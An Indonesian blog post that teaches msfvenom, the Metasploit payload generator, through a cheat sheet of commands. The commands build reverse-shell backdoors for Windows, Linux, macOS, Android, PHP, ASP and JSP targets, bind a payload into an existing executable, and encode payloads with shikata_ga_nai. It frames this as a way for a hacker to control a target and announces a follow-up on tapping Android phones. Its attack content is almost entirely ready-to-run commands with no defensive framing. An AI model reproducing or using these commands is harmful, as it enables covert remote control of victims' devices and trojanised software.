Iklan Billboard 970x250

Cara menggunakan msfvenom

Cara menggunakan msfvenom



Oke pada artikel kali ini admin mau share pengalaman admin menggunakan metasploit, yaitu cara menggunakan msfvenom, nah jika belum tau apa itu msfvenom, kalian cari tau dulu deh di google yak. banyak kok artikel nya hehe...

Nah msfvenom sendiri adalah bagian khusus yang ada di metasploit loh gaes, msfvenom bertugas untuk melakukan pembuatan backdoor/pintu belakang, nah jika sudah dibuat, hacker akan menyuruh target untuk melakukan apa yang disuruh hacker tersebut.

perintah yang biasa kita gunakan seperti ini kira kira

"msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R > shell.apk"

pengertian nya seperti berikut

Msfvenom = Untuk menjalankan program msfvenom metasploit
-p = Fungsi untuk Payload
android = Perangkat yang digunakan target
meterpreter = lokasi exploitasi
reverse_tcp = jenis exploitasi
LHOST = lokal host yang digunakan hacker
LPORT = port yang ingin digunakan hacker
R = path lokasi pembuatan payload
shell.apk = Nama payload

langsung saja cekidot dengan beberapa perintah perintah untuk membuat payload

PerintahInfo
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exeCreates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exeCreates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elfCreates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.machoCreates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apkCreats a simple TCP Payload for Android

Web Payloads

PerintahInfo
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.phpCreats a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.aspCreats a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jspCreats a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.warCreats a Simple TCP Shell for WAR

Windows Payloads

PerintahInfo
msfvenom -l encodersLists all avalaible encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exeBinds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exeCreates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe

untuk artikel berikutnya, admin mau share cara menyadap perangkat android menggunakan metasploit. Terimakasih
Binds an exe with a Payload and encodes it
Baca Juga
SHARE
Subscribe to get free updates

Related Posts

Posting Komentar

Iklan Tengah Post